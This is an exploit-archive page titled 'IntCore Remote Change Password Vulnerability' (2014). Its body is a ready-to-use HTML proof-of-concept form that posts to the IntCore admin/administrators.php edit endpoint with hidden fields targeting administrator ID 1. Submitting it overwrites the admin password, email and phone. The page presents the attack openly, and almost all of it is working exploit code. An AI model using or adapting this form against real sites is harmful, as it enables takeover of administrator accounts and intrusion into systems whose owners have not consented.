facebook facebook twitter rss

IntCore Remote Change Password Vulnerability

Author: EjRaM-HaCkEr , Published: 16-10-2014
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body>##############################<WBR>#########################
# Title: IntCore Remote Change Password Vulnerability #
# Exploit Author : EjRaM-HaCkEr #
# Version : All #
# Vendor Home : <a href="http://www.IntCore.com" target="_blank">www.IntCore.com</a> #
# Date: 14-10-2014 #
# Tested in: Linux #
# home : <a href="http://www.z3r0day.com" target="_blank">www.z3r0day.com</a> #
##############################<WBR>#########################

— Exploit —








by EjRaM-HaCkEr

<div>
<div>IntCore Remote Change Password Vulnerability</div>
<form action="http://localhost/admin/administrators.php?action=edit" method="post" target="_blank" onsubmit="return window.confirm(&quot;You are submitting information to an external page. \nAre you sure?&quot;);">
<table width="98%" cellpadding="0" cellspacing="1">
<tr>
<td width="20%"><b>اسم الدخول</b></td>
<td><input type="text" name="admin_username" size="35" value="admin"></td>
</tr>
<tr>
<td width="20%"><b>كلمة المرور</b></td>
<td><input type="text" name="admin_password" size="35"></td>
</tr>
<tr>
<td width="20%"><b>البريد الالكترونى</b></td>
<td><input type="text" name="admin_email" size="35" value="ejram@ejram.com"></td>
</tr>
<tr>
<td width="20%"><b>رقم الهاتف</b></td>
<td><input type="text" name="admin_phone" size="35" value="100000000"></td>
</tr>
<tr>
<td colspan="2" align="center"><center><input type="submit" value="تعديل"></center></td>
</tr>
</table>

<input type="hidden" name="edit" value="admin">
<input type="hidden" name="admin_id" value="1">
</form>
<div>
<br>
</div>
</div>

</body></html>

Like us on Facebook :